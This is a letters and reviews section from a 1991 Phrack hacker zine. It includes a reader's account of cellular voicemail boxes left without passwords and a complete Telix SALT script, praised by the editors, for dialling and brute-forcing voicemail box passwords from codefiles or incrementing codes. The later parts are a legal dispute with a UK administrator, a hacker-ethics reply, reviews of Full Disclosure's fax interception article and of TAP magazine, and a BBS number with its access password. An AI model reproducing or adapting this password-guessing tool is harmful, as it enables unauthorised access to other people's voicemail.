Title : Phrack Loopback
Author : Phrack Staff
==Phrack Inc.==
Volume Three, Issue Thirty-five, File 2 of 13
[-=:< Phrack Loopback >:=-]
By Phrack Staff
Phrack Loopback is a forum for you, the reader, to ask questions, air
problems, and talk about what ever topic you would like to discuss. This is
also the place The Phrack Staff will make suggestions to you by reviewing
various items of note; magazines, software, catalogs, hardware, etc.
______________________________________________________________________________
What's on Your Mind
~~~~~~~~~~~~~~~~~~
:: Hacking VMB's ::
From: Mr. Upsetter
To: [email protected]
Subject: Phrack 34 VMB article
The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
It reminded me of some experiences I had with a cellular voice mail system a
couple years ago in San Diego. I would bet there are similar systems in other
cities.
These VMB's would automatically answer calls when the subscriber wasn't on the
air. They worked just like standard VMB's. To access the box, the owner could
dial his or her own cellular number, then hit * when it answered. Then the VMB
would ask for a password.
Guess what the default password was? None! That meant all you had to do was
dial up a cellular VMB and hit *, and you were in. How many VMB's still had
the default password? About half...
To scan for cellular VMB's all you had to do was dial numbers in the cellular
prefix. It was pretty fun...almost too easy.
Cheers,
Mr. Upsetter
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>From: Zoso Puda
>
>After reading PHRACK 34 I thought it was good. Especially the article on VMB
>hacking. As a matter of fact I wrote a SALT script to help me do it.
This is exactly what we like to see. People actually getting basic
information and building on it.
- - - - - - - - - - - - - - - - - - - - - - - - - - -
+-------------------------------------+
| ZoSoft Telix VMB Hacker |
| |
| written by: Zoso Puda |
+-------------------------------------+
First words
-----------
After reading Night Ranger's article (see PHRACK 34), I decided to make a
VMB hacking program. Night Ranger provided good insight into how to hack VMB
systems but some VMBs are hard to crack. What I came up with is a program to
help me hack some of the harder systems. The ones that don't use the defaults
are tough. Also my phone has the buttons and earpiece in one unit and I had to
dial then put the phone to my ear and listen, look at the buttons to dial a
number and put the phone back to my ear to listen. It soon became tiresome.
What I finally came up with was a program to let me run all the phone
functions from the keyboard. My modem speaker is loud enough to hear clearly so
it seemed like the perfect thing to do. I also automated certain features like
incrementing the password or box number. The program is not fully automated
however. You must run this program manually. It's main purpose is to allow you
to run normal phone functions via the keyboard. If you cannot hear clearly
through your modem speaker then pick up the phone after the program dials the
VMB phone # and hang up the phone before hanging up the modem.
What follows is a brief description on how to use the program, compile the
program, and run the program. A working knowledge of VMB systems is expected.
Parameter details
-----------------
VMB phone number : If you don't know this, give it up.
Setup sequence : This code is used for systems that require a '9' or '#' or
'*' to be pressed before the box number. Up to 3 characters
can be in this string.
Valid Box # : This would be a known valid box or the box you will
be attempting to hack. This value remains constant.
Codefile filename: You may use a file to get 'default' or your favorite
passwords from. You must include the extension.
Starting box/code: Box # or code to start checking. This value will
increase automatically upon pressing [F7].
Using the function keys
-----------------------
[F1] Dials the VMB system (see params).
[F2] Hangs-up the modem.
[F3] Closes the current codefile.(see params).
[F4] Lets you set the current code/box #.
[F5] Dials the Setup sequence (see params).
[F6] Dials the current code.
[F7] Makes the next code current.
[F8] Dials the valid box (see params).
[F9] Allows you to re-set the parameters.
[F10] Hangs-up and quits the program.
[0 - 9] These keys will dial 0 - 9 respectively.
[*, #] These keys will dial * and #.
[/] Used as a substitute # for the keypad.
Basic Insructions
-----------------
Codefiles should be stored in the same directory as your Telix program.
A sample codefile should look like this:
1111
2222
3333
etc...
I suggest you make seperate codefiles for the number of digits in each code.
For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
something similar.
During parameter entry, if you enter a codefile and it exists, you will NOT
be prompted for a 'Starting box/code'. When the codefile is finished, the
current code will set itself to 1000.
If you enter a blank for the codefile or the name you entered doesn't exist
then you will be prompted for a 'Starting Box/Code'.
Compiling
---------
Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
VMBHACK.SLT into the directory where your Telix scripts are. Compile using
CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
Alt-G followed by the program name (VMBHACK).
//---------------------------<CUT HERE>-------------------------------------
// ZoSoft VMB Hacker Version 1.4
// Code by: Zoso, November 1991
//
// See PHRACK 34 for more information on VMB systems.
//
// NOTE: Do not remove the credits of the original author, modified versions
// you may add credits, but please do not remove any.
//
str code[10], // Global Variables
codes[10],
reset[1],
vmb_number[15],
borc[1],
valid[10],
setup[3];
str filename[12],
fstatus[10];
int f;
int fflag = 0;
init_modem() // Modem initialization
{
cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
cputs("^M"); // some modems, you may have to
waitfor("OK",20); // alter this. See you modem
manual.
}
vmb_dial(str string) // Dial function
{
str workstr[20];
workstr = string;
strcat(workstr,";");
cputs("ATDT");
cputs(workstr);
cputs("^M");
cputs("^M");
}
hang_up() // Hang Up function
{
hangup();
waitfor("",20);
cputs("ATH0");
cputs("^M");
cputs("^M");
clear_scr();
display();
}
next_code() // Next code function
{
int cd;
if (fflag)
{
if (not feof(f)) // Check for file first
{
fgets(code,10,f);
return;
}
if (feof(f))
{
file_close();
code = "999";
goto NEXTCODE;
}
}
NEXTCODE:
cd = stoi(code);
cd = cd + 1; // This line determines how the
code
itos(cd,code); // gets incremented.
}
set_code() // Enter new code
{
gotoxy(65,2);
gets(code,10);
}
parameters() // Set parameters
{
str c[1];
file_close();
GETINFO:
clear_scr();
printsc("VMB Hacker Parameters^M^J");
printsc("^M^JVMB phone number :");
gets(vmb_number,15);
printsc("^M^JSetup sequence :");
gets(setup,3);
printsc("^M^JValid box # :");
gets(valid,10);
printsc("^M^JCodefile filename :");
gets(filename,12);
if (filename != "")
{
open_file();
next_code();
}
if (not fflag)
{
filename = "N/A";
printsc("^M^JStarting box/code :");
gets(code,10);
}
printsc("^M^J^M^JCorrect? (Y/n):");
gets(c,1);
if (c == "n" || c == "N")
goto GETINFO;
}
press_enter() // Pause routine
{
str a[1];
pstraxy("Press [ENTER] to continue...",20,23,11);
gets(a,1);
}
title_scr() // Title screen
{
str i[1];
TITLE:
clear_scr();
pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11);
pstraxy("written for Telix by: Zoso Puda",20,6,14);
press_enter();
}
display() // Display screen
{
box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
pstraxy("VMB Number:",4,2,31); // Information display
pstraxy(vmb_number,16,2,27);
pstraxy("Valid #:",33,2,31);
pstraxy(valid,42,2,27);
pstraxy("Current:",57,2,31);
pstraxy(code,66,2,27);
pstraxy("Codefile:",6,4,31);
pstraxy(filename,16,4,27);
pstraxy("File status:",29,4,31);
pstraxy(fstatus,42,4,27);
pstraxy("Setup sequence:",50,4,31);
pstraxy(setup,66,4,27);
box(0,6,78,10,4,0,103); // Function key display
pstraxy("[ ]",30,6,111);
pstraxy(" 0 - 9,*,#",31,6,110);
pstraxy("[ ] Dial VMB", 2,7,111);
pstraxy("F1", 3,7,110);
pstraxy("[ ] Hang up",22,7,111);
pstraxy("F2",23,7,110);
pstraxy("[ ] Close file",42,7,111);
pstraxy("F3",43,7,110);
pstraxy("[ ] Set Current",61,7,111);
pstraxy("F4",62,7,110);
pstraxy("[ ] Setup seq.",2,8,111);
pstraxy("F5", 3,8,110);
pstraxy("[ ] Dial current",22,8,111);
pstraxy("F6",23,8,110);
pstraxy("[ ] Next box/code",42,8,111);
pstraxy("F7",43,8,110);
pstraxy("[ ] Valid box",61,8,111);
pstraxy("F8",62,8,110);
pstraxy("[ ] Parameters",22,9,111);
pstraxy("F9",23,9,110);
pstraxy("[ ] QUIT",41,9,111);
pstraxy("F10",42,9,110);
gotoxy(0,11);
}
quit_vmb() // End program
{
file_close();
hangup();
waitfor("",20);
clear_scr();
printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
cputs_tr(_mdm_init_str); // Restore modem params
}
open_file() // Open Codefile
{
fflag = 1;
f = fopen(filename,"r");
fstatus = "OPEN";
if (ferror(f))
file_close();
}
file_close() // Close Codefile
{
fflag = 0;
fclose(f);
fstatus = "CLOSED";
}
main() // MAIN program module
{
int chr;
title_scr();
parameters();
clear_scr();
display();
init_modem();
TOP:
gotoxy(0,11);
chr = inkeyw();
if (chr == '0') vmb_dial("0"); // Dial 0-9
if (chr == '1') vmb_dial("1");
if (chr == '2') vmb_dial("2");
if (chr == '3') vmb_dial("3");
if (chr == '4') vmb_dial("4");
if (chr == '5') vmb_dial("5");
if (chr == '6') vmb_dial("6");
if (chr == '7') vmb_dial("7");
if (chr == '8') vmb_dial("8");
if (chr == '9') vmb_dial("9");
if (chr == '#') vmb_dial("#"); // Pound sign (#)
if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad
if (chr == '*') vmb_dial("*"); // Asterisk (*)
if (chr == 15104) // F1
vmb_dial(vmb_number);
if (chr == 15360) // F2
hang_up();
if (chr == 15616) // F3
{
file_close();
display();
}
if (chr == 15872) // F4
{
set_code();
display();
}
if (chr == 16128) // F5
vmb_dial(setup);
if (chr == 16384) // F6
vmb_dial(code);
if (chr == 16640) // F7
{
next_code();
display();
}
if (chr == 16896) // F8
vmb_dial(valid);
if (chr == 17152) // F9
{
hang_up();
parameters();
display();
}
if (chr == 17408) // F10
{
quit_vmb();
goto END;
}
goto TOP;
END:
prints("^M^J");
}
//---------------------------<CUT HERE>---------------------
______________________________________________________________________________
:: More Legal Stuff ::
>From: "Michael Lawrie, Operations" <[email protected]>
>Subject: RE: Who/What is this?
>
>In this country, the receipt of documents like this would probably be
>pretty helpful in sending a person down on a conspiracy to contravene
>a section or more of the Computer Misuse Act, I do not appreciate crap
>like this appearing on my machine but since you didn't send it me, I
>can't really moan at you - What I would appreciate though is if you
>told people that forwarding it to people who don't want it is probably
>not a good idea, unless you want all your list members locked up in
>some pokey British gaol that is!
>
>Michael Lawrie.
>---
>Michael Lawrie, Hicom Group Security <[email protected]>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sir,
You will have to excuse my ignorance of telecom laws in other countries.
In the United States, distribution of technical information such as Phrack Inc.
is protected by law.
Hackers are not involved in conspiracies or plots. Most hackers could
care less about politics. Hackers are interested in the progression of
technology and learning about how our advanced society works. The inefficient
structure known as government is the last thing most hackers are interested in
exploring.
Phrack Inc. has no "membership." Phrack Inc. is an electronically
distributed publication. It is like any other security oriented newsletter.
Have you ever heard of "Computer Security Journal", "Computers and Security",
or "Computer Crime Digest?" These are some of the "security industry"
publications that are read in the U.S. Phrack Inc. merely has a little
different flavor to it. If you are interested in seeing any of these printed
journals, I can forward their address to you.
I am sorry if you received Phrack Inc. and didn't wish to read it. You
might wish to take the matter up with the person that forwarded it to you. I
hope it wasn't too big of an inconvenience for you to delete the mail message
containing Phrack Inc.
Cheers,
Dispater
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
After a (as it turns out not so private) conversation with Torq, it seems
this guy isn't even an admin anywhere. He just likes to pretend he is. Did my
reply end this little debate? NOT! This person had the nerve to intercept my
private mail to Torq and then proceeded to bitch about it some more.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>From [email protected] Sat Nov 9 09:45:53 1991
Date: Fri, 8 Nov 91 13:19 GMT
From: "Michael Lawrie, Operations" <[email protected]>
To: PHRACKSUB <<@nsfnet-relay.ac.uk:[email protected]>>
Subject: The EFF.
I found the following message the other day, whilst routing around, I am to
assume you lied to me about taking him off the list but for now we'll forget
that.
> From [email protected] Wed Oct 23 01:41:51 1991
> Date: Wed, 23 Oct 91 01:41:47 -0400
> From: [email protected]
> Message-Id: <::::::::::::::::::::::>
> To: torq@:::::::::::::::
> Subject: Phrack
>
> This guy sounds like a total idiot. If he does kill your account or something
> stupid, get a hold of the EFF. They went to bat for someone who had their
> account revoked because he/she had issues of Phrack on their directory.
>
> people should get a clue....
>
> Dispater
> [email protected]
As you say, people should get a clue. Are you assuming that 'torq' is perhaps
American and as such has his rights protected by constitution? He isn't, he is
British and doesn't really as such have much going for him. If I want to kill
his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
is not breaking any laws because it does not show intent, it would be breaking
my machine's regulations if it came here. I would enjoy the EFF to come 'to
bat' for Torq if I revoke his account for having issues of Phrack in his
directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
that you know of?
Regards...
Michael.
---
Michael Lawrie, Operations Group, Systems Development and Security.
Mail: [email protected] (Span:19527::60478::lorry)
[What pretentious signature?] (Inet: [email protected])
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From: Dispater
To: [email protected]
I never said I would delete him from the distribution list. I don't
have to DO anything. Who the hell are you pretending to be anyway? You aren't
the admin of MIT's gnu machine.
>I found the following message the other day, whilst routing around, I am to
>assume you lied to me about taking him off the list but for now we'll forget
>that.
Really? What the hell were you doing prowling though someone else's
mail? I assume you did it without Torq's permission. I wonder if MIT would
like to hear that some British hacker is rummaging around their machine? Your
"finding" of our private e-mail might place you in criminal violation of the
Electronic Communications Privacy Act of 1986. This is a federal law in the
United States which protects the privacy of electronic communications. Your
interception of our communications has violated our privacy. How would you
like me to have a little chat with YOUR supervisor?
Why you care about what takes place on the MIT computer which is located
here in the USA? In this country freedom of speech is a right granted to all
its citizens. The previous publisher of Phrack had to go to Federal Court to
prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one
damn thing you can do about it!
Dispater
______________________________________________________________________________
:: Hacker Philosophy ::
From: The Dark Lord Sarik Malthus
Organization: Underground Computing Foundation
> I'm curious...now, don't think I am trying to judge you, or your
> actions, or anything...but I am wondering how you, in your mind, justify the
> actions of hackers and the kind of information provided by your magazine?
I don't. I think people spend too much time attempting to justify
their "morality." I don't play that guilt trip. I only seek information.
Information has no morality. It is simple and pure, just like truth.
I do feel that with knowledge comes responsibility not to use it in a
destructive way. This is why I will not print "how to make bomb" files in
Phrack Inc. Explosives are made for one thing and it doesn't involve too
much creativity. People can get that type of stuff elsewhere.
I have never damaged any system or hurt any individual financially.
Carding is unquestionable robbery. If you know the person you are carding
from, that is revenge and is a different category, as far as I am concerned,
but it still doesn't make it right. Besides, any poser with half a brain can
pull a CBI. That doesn't demonstrate much talent to me. I admit I went
through the c0deZ phase, but I moved onto better things.
I guess your basic question may boil down to, "Why hack?" I see the
internet and the telecom world in as the latest frontier to be explored. If
you look back at how this country started, you will see that it was explored
by people who probably had a similar mentality to that of hackers. We want
to test ourselves. We want to have a broad range of different experiences in
our lives. We are not content with ignorance of the unknown. And, to some
extent we are sick of our current society's norms. With that in mind we
leave the security of what is considered acceptable at times.
I guess I have a lot of different unpopular views....oh well.
_______________________________________________________________________________
A Review of:
~~~~~~~~~~
Full Disclosure #23 - a publication For Truth, Justice, and The American Way
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Full Disclosure Subscription Rates:
P.O. Box 903-FD23 U.S - 12 issues for $18.00
Libertyville IL 60048 24 issues for $29.95
No Canadian orders, please!
by:Twisted Pair
About a month ago I mailed in a coupon I got from friend in order to get a
sample issue of Full Disclosure. Within a week I received Issue #23. It's got
articles on fax interception, dumpster diving, computer security tips,
surveillance tips, technical stuff, mail surveillance, etc.
The Fax Interception article was most interesting to me. I've often
wondered just how easy it could be to intercept faxes. Its all explained in
the article. Here's some text from the article:
| False Sense of Security:
|
| With the widespread proliferation of fax machines came increased use.
| In general, a document transferred has been given the same sort of
| validity as one sent or received by the U.S. Mail.* In general, such
| communications were originally secure. Now that interception equipment is
| available, the
| sense of security has become false.
*Note: Just this month, the FCC has stopped accepting paperwork with faxed
signatures on them. Their new policy states that they only accept
original signatures.
How could the average Phrack reader start intercepting faxes? Use a
standard fax machine hooked up to someone's line? Naaah. Wouldn't work. The
handshaking routine between the two corresponding fax machines would be screwed
all to hell if you threw a third machine into the mix. Full Disclosure claims
to have successfully nabbed faxes with another method. They've pointed out
this assertion with a photo on their front page of a "fax". It was supposedly
intercepted from the FBI. It shows a computer screen with an FBI "FAX" on it.
It looks more like the photo was made with some cutting and pasting at the
neighborhood PIP store. Maybe they should have added the caption "Simulated
Picture" to their front page.
They recommend using IBM PC fax boards to intercept faxes. You'd need
"sophisticated" software that would ignore the handshaking sequences between
the two fax machines you're spying on. The IBM would just save all the page
information and ignore the protocol information transmitted.
Back to the article....
| Cellular phone-based fax machines provide ripe opportunity for "hacker"
| intercepts, since the signal is available via low cost police scanners.*
| No physical connection to a common carrier network is necessary. There is
| absolutely no risk of being detected.
*Note: That should read MODIFIED police scanners. See any of the ads in
"Nuts & Volts" for a book on doing this.
Discussed in the article is something called Broadband Interception.
Commercial fax interception equipment can be hooked up to monitor satellite
link traffic. One unit can decode up to 150 simultaneous fax transmissions
from a 6,000 phone line satellite link.
Next, all the consequences of forged faxes are discussed. People have
become so reliant on fax technology that they incorrectly assume that anything
that "comes over the fax" must be legitimate. Forgers find faxing much simpler
than trying to make a "real" document. The trouble of altering postmarks and
signatures is bypassed. All they need now is scissors and tape to make any
"legitimate-looking" document needed. In their next issue, they further
discuss fax interception and all the implications of sending sensitive info by
fax.
| Fax Intercept Suppliers
| (The sale and/or use of fax interception equipment may be
| restricted by State and Federal law)
|
| Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
| Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
| El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
| [Many others listed]
Oh, here's an ad from Full Disclosure. It's a business card run:
______________________________________________________
| | |
| | Unix Systems Specialists Available July 10, 1992 |
| | |
| | L E N R O S E |
| | |
| | Convicted "Hacker" |
| | and |
| | Computer Consultant |
| | 799 Royal St. Geore #105 |
| | Naperville, IL 60563 (708) 527-1293 |
| |______________________________________________________|
Since you might want to check out a copy of Full Disclosure for yourself,
I'll include their address and stuff. The issue I had was 16 pages long,
half-newspaper size.
______________________________________________________________________________
A Review of TAP #105
~~~~~~~~~~~~~~~~~~~
TAP Magazine Subscription Rates:
PO Box 20264 10 issues for $10.00
Louisville KY 40250-0264
by Dispater
Around March of 1991 I mailed in my $10. for a subscription to TAP
Magazine. Promoted as "the oldest hacker magazine" and "created by Abbie
Hoffman." I still, to this day, have not received ONE issue for my money.
While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
back issues consisting of #97, #100 through issue #104. I was later given a
complimentary issue of #105. After asking about #98 & #99, Predat0r said that
he wasn't going to give those out because of some bullshit with Aristotle.
Whatever...I still don't see why we couldn't see it.
Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
but it wasn't bad either. The issue was 18 pages long. For those of you who
have never seen it, TAP contains information on hacking and phreaking as well
as some political commentary. The articles are always diverse and interesting.
TAP #105 contained information about the DNA Box. This is basically
cellular phone phreaking. It was very good and quite detailed. There were
also schematics of bugs and a flow chart explaining the incident initiation
sequence of the E-911 system. This issue of TAP was sprinkled with some neat
advertisements and news clippings (as usual) and wrapped up with a file about
Blue Boxing. The price of $10.00 for 10 issues is worth it, but read on...
Last week I asked Predat0r what was going on with TAP magazine. He told
me that he had the material for the next three issues, but his copier or some
other equipment was broken. This is an excuse I have heard before. Whether it
is a valid excuse or not, only he knows. Since issue #105 (June) there has
been not one issue of TAP. If you have ordered a subscription prior to July
and not received anything, I highly suggest you write to Predat0r.
The material contained in TAP is good and very much worth the price.
(Especially compared to 2600 Magazine) However, I find that the general
management of TAP to be poor, at this time, and therefore I highly recommend
that you NOT send your $10 to TAP Magazine. Considering the amount of
advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
2600, etc.) in the past year, there is no excuse for the non-existent service
that has transpired. Predat0r is a good sysop and needs to manage TAP as he
does his BBS. I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
COLUMBIAN COKE.
I really don't like to be so critical, but I know some people I've talked
to are feeling ripped off. This is why I wrote this. I truly hope that TAP
can get out of this slump.
_______________________________________________________________________________